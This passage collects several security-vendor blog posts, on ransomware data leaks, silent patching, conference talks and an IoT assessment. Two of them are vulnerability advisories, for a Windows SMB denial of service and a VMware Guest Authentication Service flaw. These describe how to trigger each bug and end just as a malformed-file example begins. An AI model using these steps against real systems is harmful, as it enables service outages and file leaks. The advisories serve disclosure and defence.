Apply the WatchGuard Fireware updates. If possible, remove internet access to the appliance’s SSH interface. Out of an abundance of caution, changing passwords after updating is a good idea.

Vendor statement

WatchGuard thanks Rapid7 for their quick vulnerability report and willingness to work through a responsible disclosure process to protect our customers. We always appreciate working with external researchers to identify and resolve vulnerabilities in our products and we take all reports seriously. We have issued a resolution for this vulnerability, as well as several internally discovered issues, and advise our customers to upgrade their Firebox and XTM products as quickly as possible. Additionally, we recommend all administrators follow our published best practices for secure remote management access to their Firebox and XTM devices.

Disclosure timeline

March, 2022: Discovered by Jake Baines of Rapid7
Mar 29, 2022: Reported to Watchguard via support phone, issue assigned case number 01676704.
Mar 29, 2022: Watchguard acknowledged follow-up email.
April 20, 2022: Rapid7 followed up, asking for progress.
April 21, 2022: WatchGuard acknowledged again they were researching the issue.
May 26, 2022: Rapid7 checked in on status of the issue.
May 26, 2022: WatchGuard indicates patches should be released in June, and asks about CVE assignment.
May 26, 2022: Rapid7 assigns CVE-2022-31749
June 23, 2022: This disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/06/16/new-report-shows-what-data-is-most-at-risk-to-and-prized-by-ransomware-attackers/

New Report Shows What Data Is Most at Risk to (and Prized by) Ransomware Attackers

Ransomware is one of the most pressing and diabolical threats faced by cybersecurity teams today. Gaining access to a network and holding that data for ransom has caused billions in losses across nearly every industry and around the world. It has stopped critical infrastructure like healthcare services in its tracks, putting the lives and livelihoods of many at risk.

In recent years, threat actors have upped the ante by using “double extortion” as a way to inflict maximum pain on an organization. Through this method, not only are threat actors holding data hostage for money – they also threaten to release that data (either publicly or for sale on dark web outlets) to extract even more money from companies.

At Rapid7, we often say that when it comes to ransomware, we may all be targets, but we don’t all have to be victims. We have means and tools to mitigate the impact of ransomware — and one of the most important assets we have on our side is data about ransomware attackers themselves.

Reports about trends in ransomware are pretty common these days. But what isn’t common is information about what kinds of data threat actors prefer to collect and release.

A new report from Rapid7’s Paul Prudhomme uses proprietary data collection tools to analyze the disclosure layer of double-extortion ransomware attacks. He identified the types of data attackers initially disclose to coerce victims into paying ransom, determining trends across industry, and released it in a first-of-its-kind analysis.

“Pain Points: Ransomware Data Disclosure Trends” reveals a story of how ransomware attackers think, what they value, and how they approach applying the most pressure on victims to get them to pay.

The report looks at all ransomware data disclosure incidents reported to customers through our Threat Command threat intelligence platform (TIP). It also incorporates threat intelligence coverage and Rapid7’s institutional knowledge of ransomware threat actors.

From this, we were able to determine:

  • The most common types of data attackers disclosed in some of the most highly affected industries, and how they differ
  • How leaked data differs by threat actor group and target industry
  • The current state of the ransomware market share among threat actors, and how that has changed over time

Finance, pharma, and healthcare

Overall, trends in ransomware data disclosures pertaining to double extortion varied slightly, except in a few key verticals: pharmaceuticals, financial services, and healthcare. In general, financial data was leaked most often (63%), followed by customer/patient data (48%).

However, in the financial services sector, customer data was leaked most of all, rather than financial data from the firms themselves. Some 82% of disclosures linked to the financial services sector were of customer data. Internal company financial data, which was the most exposed data in the overall sample, made up just 50% of data disclosures in the financial services sector. Employees’ personally identifiable information (PII) and HR data were more prevalent, at 59%.

In the healthcare and pharmaceutical sectors, internal financial data was leaked some 71% of the time, more than any other industry — even the financial services sector itself. Customer/patient data also appeared with high frequency, having been released in 58% of disclosures from the combined sectors.

One thing that stood out about the pharmaceutical industry was the prevalence of threat actors to release intellectual property (IP) files. In the overall sample, just 12% of disclosures included IP files, but in the pharma industry, 43% of all disclosures included IP. This is likely due to the high value placed on research and development within this industry.

The state of ransomware actors

One of the more interesting results of the analysis was a clearer understanding of the state of ransomware threat actors. It’s always critical to know your enemy, and with this analysis, we can pinpoint the evolution of ransomware groups, what data the individual groups value for initial disclosures, and their prevalence in the “market.”

For instance, between April and December 2020, the now-defunct Maze Ransomware group was responsible for 30%. This “market share” was only slightly lower than that of the next two most prevalent groups combined (REvil/Sodinokibi at 19% and Conti at 14%). However, the demise of Maze in November of 2020 saw many smaller actors stepping in to take its place. Conti and REvil/Sodinokibi swapped places respectively (19% and 15%), barely making up for the shortfall left by Maze. The top five groups in 2021 made up just 56% of all attacks with a variety of smaller, lesser-known groups being responsible for the rest.

Recommendations for security operations

While there is no silver bullet to the ransomware problem, there are silver linings in the form of best practices that can help to protect against ransomware threat actors and minimize the damage, should they strike. This report offers several that are aimed around double extortion, including:

  • Going beyond backing up data and including strong encryption and network segmentation
  • Prioritizing certain types of data for extra protection, particularly for those in fields where threat actors seek out that data in particular to put the hammer to those organizations the hardest
  • Understanding that certain industries are going to be targets of certain types of leaks and ensuring that customers, partners, and employees understand the heightened risk of disclosures of those types of data and to be prepared for them

To get more insights and view some (well redacted) real-world examples of data breaches, check out the full paper.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Complimentary GartnerⓇ Report “How to Respond to the 2022 Cyberthreat Landscape”: Ransomware Edition

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/15/complimentary-gartner-report-how-to-respond-to-the-2022-cyberthreat-landscape-ransomware-edition/

Complimentary GartnerⓇ Report

First things first — if you’re a member of a cybersecurity team bouncing from one stressful identify vulnerability, patch, repeat cycle to another, claim your copy of the GartnerⓇ report “How to Respond to the 2022 Cyberthreat Landscape” right now. It will help you understand the current landscape and better plan for what’s happening now and in the near term.

Ransomware is on the tip of every security professional’s tongue right now, and for good reason. It’s growing, spreading, and evolving faster than many organizations can keep up with. But just because we may all be targets doesn’t mean we have to be victims.

The analysts at Gartner have taken a good, long look at the latest trends in security, with a particular eye toward ransomware, and they had this to say about attacker trends in their report.

Expect attackers to:

  • “Diversify their targets by pursuing lower-profile targets more frequently, using smaller attacks to avoid attention from well-funded nation states.”
  • “Attack critical CPS, particularly when motivated by geopolitical tensions and aligned ransomware actors.”
  • “Optimize ransomware delivery by using ‘known good’ cloud applications, such as enterprise productivity software as a service (SaaS) suites, and using encryption to hide their activities.”
  • “Target individual employees, particularly those working remotely using potentially vulnerable remote access services like Remote Desktop Protocol (RDP) services, or simply bribe employees for access to organizations with a view to launching larger ransomware campaigns.”
  • “Exfiltrate data as part of attempts to blackmail companies into paying ransom or risk data breach disclosure, which may result in regulatory fines and limits the benefits of the traditional mitigation method of ‘just restore quickly.'”
  • “Combine ransomware with other techniques, such as distributed denial of service (DDoS) attacks, to force public-facing services offline until organizations pay a ransom.”

Ransomware is most definitely considered a “top threat,” and it has moved beyond just an IT problem but one that involves governments around the globe. Attackers recognize that the game got a lot bigger with well-funded nations joining the fray to combat it, so their tactics will be targeted, small, diverse, and more frequent to avoid poking the bear(s). Expect to see smaller organizations targeted more often and as part of ransomware-as-a-service campaigns.

Gartner also says that attackers will use RaaS to attack critical infrastructure like CPS more frequently:

“Attackers will aim at smaller targets and deliver ‘ransomware as a service’ to other groups. This will enable more targeted and sophisticated attacks, as the group targeting an organization will have access to ransomware developed by a specialist group. Attackers will also target critical assets, such as CPS.”

Mitigating ransomware

But there are things we can do to mitigate ransomware attacks and push back against the attackers. Gartner suggests several key recommendations, including:

  • “Construct a pre-incident strategy that includes backup (including a restore test), asset management, and restriction of user privileges.”
  • “Build post-incident response procedures by training staff and scheduling regular drills.”
  • “Expand the scope of ransomware protection programs to CPS.”
  • “Increase cross-team training for the nontechnical aspects of a ransomware incident.
  • “Remember that payment of a ransom does not guarantee erasure of exfiltrated data, full recovery of encrypted data, or immediate restoration of operations.”
  • “Don’t rely on cyber insurance only. There is frequently a disconnect between what executive leaders expect a cybersecurity insurance policy to cover and what it actually does cover.”

At Rapid7, we have the risk management, detection and response, and threat intelligence tools your organization needs to not only keep up with the evolution in ransomware threat actors, but to implement best practices of the industry.

If you want to learn more about what cybersecurity threats are out there now and on the horizon, check out the complimentary Gartner report.

Gartner, How to Respond to the 2022 Cyberthreat Landscape, 1 April 2022, by Jeremy D’Hoinne, John Watts, Katell Thielemann

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/06/14/cve-2022-32230-windows-smb-denial-of-service-vulnerability-fixed/

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

A remote and unauthenticated attacker can trigger a denial-of-service condition on Microsoft Windows Domain Controllers by leveraging a flaw that leads to a null pointer deference within the Windows kernel. We believe this vulnerability would be scored as CVSSv3 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H or 7.5. This vulnerability was silently patched by Microsoft in April of 2022 in the same batch of changes that addressed the unrelated CVE-2022-24500 vulnerability.

Credit

This issue was fixed by Microsoft without disclosure in April 2022, but because it was originally classed as a mere stability bug fix, it did not go through the usual security issue process. In May, Spencer McIntyre of Rapid7 discovered this issue while researching the fix for CVE-2022-24500 and determined the security implications of CVE-2022-32230. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

CVE-2022-32230 is caused by a missing check in srv2!Smb2ValidateVolumeObjectsMatch to verify that a pointer is not null before reading a PDEVICE_OBJECT from it and passing it to IoGetBaseFileSystemDeviceObject. The following patch diff shows the function in question for Windows 10 21H2 (unpatched version 10.0.19041.1566 on the left).

CVE-2022-32230: Windows SMB Denial-of-Service Vulnerability (FIXED)

This function is called from the dispatch routine for an SMB2 QUERY_INFO request of the FILE_INFO / FILE_NORMALIZED_NAME_INFORMATION class. Per the docs in MS-SMB2 section 3.3.5.20.1 Handling SMB2_0_INFO_FILE, FILE_NORMALIZED_NAME_INFORMATION is only available when the dialect is 3.1.1.

For FileNormalizedNameInformation information class requests, if not supported by the server implementation<392>, or if Connection.Dialect is "2.0.2", "2.1" or "3.0.2", the server MUST fail the request with STATUS_NOT_SUPPORTED.

To trigger this code path, a user would open any named pipe from the IPC$ share and make a QUERY_INFO request for the FILE_NORMALIZED_NAME_INFORMATION class. This typically requires user permissions or a non-default configuration enabling guest access. This is not the case, however, for the noteworthy exception of domain controllers where there are multiple named pipes that can be opened anonymously, such as netlogon. An alternative named pipe that can be used but does typically require permissions is the srvsvc pipe.

Under normal circumstances, the FILE_NORMALIZED_NAME_INFORMATION class would be used to query the normalized name information of a file that exists on disk. This differs from the exploitation scenario which queries a named pipe.

A system that has applied the patch for this vulnerability will respond to the request with the error STATUS_NOT_SUPPORTED.

Proof of concept

A proof-of-concept Metasploit module is available on GitHub. It requires Metasploit version 6.2 or later.

Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition. Given the current state of the art of exploitation, it is assumed that a null pointer dereference in the Windows kernel is not remotely exploitable for the purpose of arbitrary code execution without combining it with another, unrelated vulnerability.

In the default configuration, Windows will automatically restart after a BSOD.

Remediation

It is recommended that system administrators apply the official patches provided by Microsoft in their April 2022 update. If that is not possible, restricting access and disabling SMB version 3 can help remediate this flaw.

Disclosure timeline

April 12th, 2022 – Microsoft patches CVE-2022-32230
April 29th, 2022 – Rapid7 finds and confirms the vulnerability while investigating CVE-2022-24500
May 4th, 2022 – Rapid7 contacts MSRC to clarify confusion regarding CVE-2022-32230
May 18th, 2022 – Microsoft responds to Rapid7, confirming that the vulnerability now identified as CVE-2022-32230 is different from the disclosed vulnerability CVE-2022-24500 with which it was patched
June 1, 2022 — Rapid7 reserves CVE-2022-32230 after discussing with Microsoft
June 14th, 2022 – Rapid7 releases details in this disclosure, and Microsoft publishes its advisory

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Defending Against Tomorrow’s Threats: Insights From RSAC 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/13/defending-against-tomorrows-threats-insights-from-rsac-2022/

Defending Against Tomorrow's Threats: Insights From RSAC 2022

The rapidly changing pace of the cyberthreat landscape is on every security pro’s mind. Not only do organizations need to secure complex cloud environments, they’re also more aware than ever that their software supply chains and open-source elements of their application codebase might not be as ironclad as they thought.

It should come as no surprise, then, that defending against a new slate of emerging threats was a major theme at RSAC 2022. Here’s a closer look at what some Rapid7 experts who presented at this year’s RSA conference in San Francisco had to say about staying ahead of attackers in the months to come.

Surveying the threat landscape

Security practitioners often turn to Twitter for the latest news and insights from peers. As Raj Samani, SVP and Chief Data Scientist, and Lead Security Researcher Spencer McIntyre pointed out in their RSA talk, “Into the Wild: Exploring Today’s Top Threats,” the trend holds true when it comes to emerging threats.

“For many people, identifying threats is actually done through somebody that I follow on Twitter posting details about a particular vulnerability,” said Raj.

As Spencer noted, security teams need to be able to filter all these inputs and identify the actual priorities that require immediate patching and remediation. And that’s where the difficulty comes in.

“How do you manage a patching strategy when there are critical vulnerabilities coming out … it seems weekly?” Raj asked. “Criminals are exploiting these vulnerabilities literally in days, if that,” he continued.

Indeed, the average time to exploit — i.e., the interval between a vulnerability being discovered by researchers and clear evidence of attackers using it in the wild — plummeted from 42 days in 2020 to 17 days in 2021, as noted in Rapid7’s latest Vulnerability Intelligence Report. With so many threats emerging at a rapid clip and so little time to react, defenders need the tools and expertise to understand which vulnerabilities to prioritize and how attackers are exploiting them.

“Unless we get a degree of context and an understanding of what’s happening, we’re going to end up ignoring many of these vulnerabilities because we’ve just got other things to worry about,” said Raj.

The evolving threat of ransomware

One of the things that worry security analysts, of course, is ransomware — and as the threat has grown in size and scope, the ransomware market itself has changed. Cybercriminals are leveraging this attack vector in new ways, and defenders need to adapt their strategies accordingly.

That was the theme that Erick Galinkin, Principal AI Researcher, covered in his RSA talk, “How to Pivot Fast and Defend Against Ransomware.” Erick identified four emerging ransomware trends that defenders need to be aware of:

  • Double extortion: In this type of attack, threat actors not only demand a ransom for the data they’ve stolen and encrypted but also extort organizations for a second time — pay an additional fee, or they’ll leak the data. This means that even if you have backups of your data, you’re still at risk from this secondary ransomware tactic.
  • Ransomware as a service (RaaS): Not all threat actors know how to write highly effective ransomware. With RaaS, they can simply purchase malicious software from a provider, who takes a cut of the payout. The result is a broader and more decentralized network of ransomware attackers.
  • Access brokers: A kind of mirror image to RaaS, access brokers give a leg up to bad actors who want to run ransomware on an organization’s systems but need an initial point of entry. Now, that access is for sale in the form of phished credentials, cracked passwords, or leaked data.
  • Lateral movement: Once a ransomware attacker has infiltrated an organization’s network, they can use lateral movement techniques to gain a higher level of access and ransom the most sensitive, high-value data they can find.

With the ransomware threat growing by the day and attackers’ techniques growing more sophisticated, security pros need to adapt to the new landscape. Here are a few of the strategies Erick recommended for defending against these new ransomware tactics.

  • Continue to back up all your data, and protect the most sensitive data with strong admin controls.
  • Don’t get complacent about credential theft — the spoils of a might-be phishing attack could be sold by an access broker as an entry point for ransomware.
  • Implement the principle of least privilege, so only administrator accounts can perform administrator functions — this will help make lateral movement easier to detect.

Shaping a new kind of SOC

With so much changing in the threat landscape, how should the security operations center (SOC) respond?

This was the focus of “Future Proofing the SOC: A CISO’s Perspective,” the RSA talk from Jeffrey Gardner, Practice Advisor for Detection and Response (D&R). In addition to the sprawling attack surface, security analysts are also experiencing a high degree of burnout, understandably overwhelmed by the sheer volume of alerts and threats. To alleviate some of the pressure, SOC teams need a few key things:

For Jeffrey, these needs are best met through a hybrid SOC model — one that combines internally owned SOC resources and staff with external capabilities offered through a provider, for a best-of-both-worlds approach. The framework for this approach is already in place, but the version that Jeffrey and others at Rapid7 envision involves some shifting of paradigms. These include:

  • Collapsing the distinction between product and service and moving toward “everything as a service,” with a unified platform that allows resources — which includes everything from in-product features to provider expertise and guidance — to be delivered at a sliding scale
  • Ensuring full transparency, so the organization understands not only what’s going on in their own SOC but also in their provider’s, through the use of shared solutions
  • More customization, with workflows, escalations, and deliverables tailored to the customer’s needs

Meeting the moment

It’s critical to stay up to date with the most current vulnerabilities we’re seeing and the ways attackers are exploiting them — but to be truly valuable, those insights must translate into action. Defenders need strategies tailored to the realities of today’s threat landscape.

For our RSA 2022 presenters, that might mean going back to basics with consistent data backups and strong admin controls. Or it might mean going bold by fully reimagining the modern SOC. The techniques don’t have to be new or fancy or to be effective — they simply have to meet the moment. (Although if the right tactics turn out to be big and game-changing, we’ll be as excited as the next security pro.)

Looking for more insights on how defenders can protect their organizations amid today’s highly dynamic threat landscape? You can watch these presentations — and even more from our Rapid7 speakers — at our library of replays from RSAC 2022.

Additional reading

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/10/video-an-inside-look-at-the-rsa-2022-experience-from-the-rapid7-team/

[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

The two years since the last RSA Conference have been pretty uneventful. Sure, COVID-19 sent us all to work from home for a little while, but it’s not as though we’ve seen any supply-chain-shattering breaches, headline-grabbing ransomware attacks, internet-inferno vulnerabilities, or anything like that. We’ve mostly just been baking sourdough bread and doing woodworking in between Zoom meetings.

OK, just kidding on basically all of that (although I, for one, have continued to hone my sourdough game). ​

The reality has been quite the opposite. Whether it’s because an unprecedented number of crazy things have happened since March 2020 or because pandemic-era uncertainty has made all of our experiences feel a little more heightened, the past 24 months have been a lot. And now that restrictions on gatherings are largely lifted in most places, many of us are feeling like we need a chance to get together and debrief on what we’ve all been through.

Given that context, what better timing could there have been for RSAC 2022? This past week, a crew of Rapid7 team members gathered in San Francisco to sync up with the greater cybersecurity community and take stock of how we can all stay ahead of attackers and ready for the future in the months to come. We asked four of them — Jeffrey Gardner, Practice Advisor – Detection & Response; Tod Beardsley, Director of Research; Kelly Allen, Social Media Manager; and Erick Galinkin, Principal Artificial Intelligence Researcher — to tell us a little bit about their RSAC 2022 experience. Here’s a look at what they had to say — and a glimpse into the excitement and energy of this year’s RSA Conference.

What’s it been like returning to full-scale in-person events after 2 years?



[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

What was your favorite session or speaker of the week? What made them stand out?



[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

What was your biggest takeaway from the conference? How will it shape the way you think about and practice cybersecurity in the months to come?



[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

Want to relive the RSA experience for yourself? Check out our replays of Rapid7 speakers’ sessions from the week.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

The Hidden Harm of Silent Patches

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/06/06/the-hidden-harm-of-silent-patches/

The Hidden Harm of Silent Patches

Hey all. I’m about to head off to RSAC 2022, but I wanted to jot down some thoughts I’ve had lately on a particularly squirrelly issue that comes up occasionally in coordinated vulnerability disclosure (CVD) — the issue of silent patches, and how they tend to help focused attackers and harm IT protectors.

In the bad old days, most major software vendors were rather notorious for sweeping vulnerability reports under the rug. They made it difficult for legitimate researchers to report vulnerabilities, often by accident, occasionally on purpose. Researchers would report bugs, and those reports would fester in unobserved space, then suddenly the proof-of-concept exploit wouldn’t work any more. This was (and is) the standard silent patching model. No credit, no explanation, no CVE ID, nothing.

The justification for this approach seems pretty sensible, though. Why would a vendor go out of their way to explain what a security fix does? After all, if you know how the patch works, then you have a pretty good guess at the root cause of the vulnerability and, therefore, how the exploit works. So, by publicizing these patch details, you’re effectively leading attackers to the goods, based on your own documentation. Not cool, right?

So, the natural conclusion is that by limiting the technical details of a given vulnerability to merely the patch contents, and by withholding those details explained in plan languages and proof-of-concept exploit code and screenshots and videos and all the rest, you are limiting the general knowledge pool of people who actually understand the vulnerability and how to exploit it.

Unpacking the silent patch

This sounds like a great plan, but there’s a catch. When a software company releases a patch for software, in nearly all cases, they’re not using exotic packers, they’re not employing anti-forensics, and even if the patch data is encrypted and obfuscated, at some point it’s got to modify the code on the running software — which means that it’s all available to anyone who has a running instance of the patched software and knows how to use a debugger and a disassembler. And who uses debuggers to inspect the effects of patches? Exploit developers, pretty much exclusively.

Knowing this, let’s modify the expectations of the silent patch strategy: When you silently patch, you are intending to limit knowledge of the patched vulnerability to skilled exploit devs.

It’s still true that you’re excluding the casual attacker (or “script kiddie,” in the common parlance), and that’s great and desirable. However, you’re also excluding a huge population of IT protectors: penetration testers who are paid to write and run exploits to test defenses leap to mind, in addition to the folks who write and deploy defensive technologies like vulnerability management, intrusion detection and prevention, incident detection, and all the rest. You also exclude tech journalists, academics, and policy makers who want to understand and communicate the nature of software vulnerabilities, but who aren’t likely to bust out a disassembler.

Most significantly, you’re excluding the most important audience for your patch: the regular IT administrators and managers who need to sort out the incoming flow of patches based on some risk and severity criteria and make the call for downtime and update scheduling based on that criteria. Not all vulnerabilities are equal, and while protectors want to get around to all of them, they need to figure out which ones to apply today and which ones can wait for the next maintenance cycle.

By the way, it’s true that some of these IT professionals also have the capability to reverse-engineer your patch. In practice, people who are only interested in keeping IT humming never, ever reverse patches to see if they’re worth applying. It’s way too complicated and time-consuming. I’ve never seen a case where this is part of the decision-making process to patch now or later.

Don’t leave defenders in the dark

So now, let’s reexamine the case for silent patching yet again: When you silently patch, you are communicating vulnerability details, exclusively, to skilled, criminal attackers who are specifically targeting your product, while leaving your customers in the dark. You are intentionally withholding information from casual attackers, secondary defenders, and your customers and users who are desperate to make informed security engineering decisions involving your product or project. Oh, and let’s not forget, you’re also limiting knowledge about these fixed vulnerabilities from future employees and contributors, who very well might re-introduce the same or similar bugs in your product down the road. After all, the details are secret, even from future-you.

All this is to say, silent patching is tantamount to full disclosure to a very small audience who mostly want to hurt you and your users. Fully documented patches reach the much, much larger audience of people, present and future, who want to help you and your users. While it’s true that you are also offering educational opportunities to casual attackers along the way, I believe the global population of casual attackers is much, much smaller than your legitimate users and all the secondary and tertiary defenders who are on your side.

So, next time a vulnerability researcher states their intention of publishing details about their reported (and now patched) vulnerability, try to examine your urge to keep those details under wraps, and maybe even encourage them to be honest and transparent with their findings. The alternative is to build up the operational capabilities of the true criminal and espionage enterprises while degrading the decision-making power of IT protectors.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Evaluating the Security of an Enterprise IoT Deployment at Domino’s Pizza

Post Syndicated from Deral Heiland original https://blog.rapid7.com/2022/06/06/evaluating-the-security-of-an-enterprise-iot-deployment-at-dominos-pizza/

Evaluating the Security of an Enterprise IoT Deployment at Domino's Pizza

Recently, I had a great opportunity to work with Domino’s Pizza to evaluate an internally conceived Internet of Things (IoT)-based business solution they had designed and deployed throughout their US store locations. The goal of this research project was to understand the security implications around a large-scale enterprise IoT project and processes related to:

  • Acquisition, implementation, and deployment
  • Technology and functionality
  • Management and support

Laying the groundwork

I sat down with each of the internal teams involved with this project, and we discussed those key areas and how security was defined and applied within each. I gained valuable new insight into how security should play into the design and construction of a large IoT business solution, especially within the planning and acquisition phases. This opportunity allowed me to see how a security-driven organization like Domino’s approaches a large-scale project like this.

I walked away from this phase of the project with some great takeaways that should be considered on all like-minded projects:

  • Always consider vendor security in your risk planning and modeling
  • Security “must-haves” should map to your organization’s internal security policies

Assessing the security status quo

Also, as part of this research project, I conducted a full ecosystem security assessment, examining all the critical hardware components, operation software, and associated network communications. As with any large-scale enterprise implementation, we did find a few security problems. This is the main reason all projects, even those with security built in from the start, should go through a wide-ranging security assessment to flush out any shortcomings that could be lurking under the hood. Once completed, I delivered a comprehensive report, which the security teams and project developers then used to quickly create solutions for fixing the identified issues.

This also allowed me the chance to observe and discuss the processes and methodologies used by this enterprise organization for building and deploying fixes into production and doing that in a safe way to avoid impacting production.

During a typical security assessment of an enterprise-wide business solution like this, we are reminded of a couple key best-practice items that should always be considered, such as:

  • When testing the security for a new technology, use a holistic approach that targets the entire solutions ecosystem.
  • Conduct regular testing of documented security procedures — security is a moving target, and testing these procedures regularly can help identify deficiencies.

Bringing the idea to life

Once an idea is designed, built, and deployed into production, we have to make sure the deployed solution remains fully functional and secure. To accomplish that, we moved the deployed enterprise IoT solution under a structured management and support plan at Domino’s. This support structure was designed as expected to help avoid or prevent outages and security incidents that could impact production, loss of services, or loss of data, focusing on:

Again, it was nice to sit down with the various teams involved in the support infrastructure and talk security and to also see how it was not only applied to this specific project, but how the organization applied these same security methodologies across the whole enterprise.

During this final evaluation phase of this project, I was reminded of one of the most critical takeaways that many organizations — unlike Domino’s, who did it correctly — fail to apply: When deploying new embedded technology within your enterprise environment, make sure the technology is properly integrated into your organization’s patch management.

At the conclusion of this research project, I took away a greatly improved understanding of the complexity, difficulties, and security best-practice challenges a large enterprise IoT project could demand. I was pleased to see, and work with, an organization that was up to that challenge and who successfully delivered this project to their business.

If you’d like to read more detail on this security research project, check out my report here.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Join us at the launch event of the Raspberry Pi Computing Education Research Centre

Post Syndicated from Sue Sentance original https://www.raspberrypi.org/blog/raspberry-pi-computing-education-research-centre-launch-event-invitation/

Last summer, the Raspberry Pi Foundation and the University of Cambridge Department of Computer Science and Technology created a new research centre focusing on computing education research for young people in both formal and non-formal education. The Raspberry Pi Computing Education Research Centre is an exciting venture through which we aim to deliver a step-change for the field.

school-aged girls and a teacher using a computer together.

Computing education research that focuses specifically on young people is relatively new, particularly in contrast to established research disciplines such as those focused on mathematics or science education. However, computing is now a mandatory part of the curriculum in several countries, and being taken up in education globally, so we need to rigorously investigate the learning and teaching of this subject, and do so in conjunction with schools and teachers.

You’re invited to our in-person launch event

To celebrate the official launch of the Raspberry Pi Computing Education Research Centre, we will be holding an in-person event in Cambridge, UK on Weds 20 July from 15.00. This event is free and open to all: if you are interested in computing education research, we invite you to register for a ticket to attend. By coming together in person, we want to help strengthen a collaborative community of researchers, teachers, and other education practitioners.

The launch event is your opportunity to meet and mingle with members of the Centre’s research team and listen to a series of short talks. We are delighted that Prof. Mark Guzdial (University of Michigan), who many readers will be familiar with, will be travelling from the US to join us in cutting the ribbon. Mark has worked in computer science education for decades and won many awards for his research, so I can’t think of anybody better to be our guest speaker. Our other speakers are Prof. Alastair Beresford from the Department of Computer Science and Technology, and Carrie Anne Philbin MBE, our Director of Educator Support at the Foundation.

The event will take place at the Department of Computer Science and Technology in Cambridge. It will start at 15.00 with a reception where you’ll have the chance to talk to researchers and see the work we’ve been doing. We will then hear from our speakers, before wrapping up at 17.30. You can find more details about the event location on the ticket registration page.

Our research at the Centre

The aim of the Raspberry Pi Computing Education Research Centre is to increase our understanding of teaching and learning computing, computer science, and associated subjects, with a particular focus on young people who are from backgrounds that are traditionally under-represented in the field of computing or who experience educational disadvantage.

Young learners at computers in a classroom.

We have been establishing the Centre over the last nine months. In October, I was appointed Director, and in December, we were awarded funding by Google for a one-year research project on culturally relevant computing teaching, following on from a project at the Raspberry Pi Foundation. The Centre’s research team is uniquely positioned, straddling both the University and the Foundation. Our two organisations complement each other very well: the University is one of the highest-ranking universities in the world and renowned for its leading-edge academic research, and the Raspberry Pi Foundation works with schools, educators, and learners globally to pursue its mission to put the power of computing into the hands of young people.

In our research at the Centre, we will make sure that:

  1. We collaborate closely with teachers and schools when implementing and evaluating research projects
  2. We publish research results in a number of different formats, as promptly as we can and without a paywall
  3. We translate research findings into practice across the Foundation’s extensive programmes and with our partners

We are excited to work with a large community of teachers and researchers, and we look forward to meeting you at the launch event.

Stay up to date

At the end of June, we’ll be launching a new website for the Centre at computingeducationresearch.org. This will be the place for you to find out more about our projects and events, and to sign up to our newsletter. For announcements on social media, follow the Raspberry Pi Foundation on Twitter or Linkedin.

The post Join us at the launch event of the Raspberry Pi Computing Education Research Centre appeared first on Raspberry Pi.

CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/05/24/cve-2022-22977-vmware-guest-authentication-service-lpe-fixed/

CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)

A low-privileged local attacker can prevent the VMware Guest Authentication service (VGAuthService.exe) from running in a guest Windows environment and can crash this service, thus rendering the guest unstable. In some very contrived circumstances, the attacker can leak file content to which they do not have read access. We believe this would be scored as CVSSv3 AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H or 6.1 and is an instance of CWE-73: External Control of File Name or Path.

Product description

The VMware Guest Authentication Service (VGAuthService.exe) is part of the VMware Tools suite of software used to provide integration services with other VMware services. It is commonly installed on Windows guest operating systems, though it appears that its only function is to mystify users when it fails.

Credit

This issue was discovered by Jake Baines of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The versions of VMware host and guest operating systems are:

  • Host platform: MacOS Big Sur 11.6.1
  • Host software: VMware Fusion Professional 12.2.1 (18811640)
  • Virtualized platform: Windows 10.0.17763.1999 and Windows Server 2019
  • Vulnerable software: VGAuthService.exe (VMware Guest Authentication Service) “File version: 11.3.5.59284”, “Product version 1.0.0. Build-18556986”

Once running, the VMware Guest Authentication Service (VGAuthService.exe) is a service running with NT AUTHORITY/SYSTEM permissions and attempts to read files from the non-existent directory C:\Program%20Files\VMware\VMware%20Tools\ during start-up.

CVE-2022-22977: VMware Guest Authentication Service LPE (FIXED)

A low-privileged user can create this directory structure and cause VGAuthService.exe to read attacker controlled files. The files that the attacker controls are “catalog”, “xmldsig-core-schema.xsd”, and “xenc-schema.xsd”. These files are used to define the XML structure used to communicate with VGAuthService.exe.

However, actually modifying the structure of these files seems to have limited effects on VGAuthService.exe. Below, we describe a denial of service (which could take a number of forms) and a file content leak via XML External Entity.

Impact

The most likely impact of an exploit leveraging this vulnerability is a denial-of-service condition, and there is a remote possibility of privileged file content exfiltration.

Denial of service

A low-privileged user can prevent the service from starting by providing a malformed catalog file. For example, creating the file C:\Program%20Files\VMware\VMware%20Tools\etc\catalog with the contents of:

<?xml version="1.0"?>
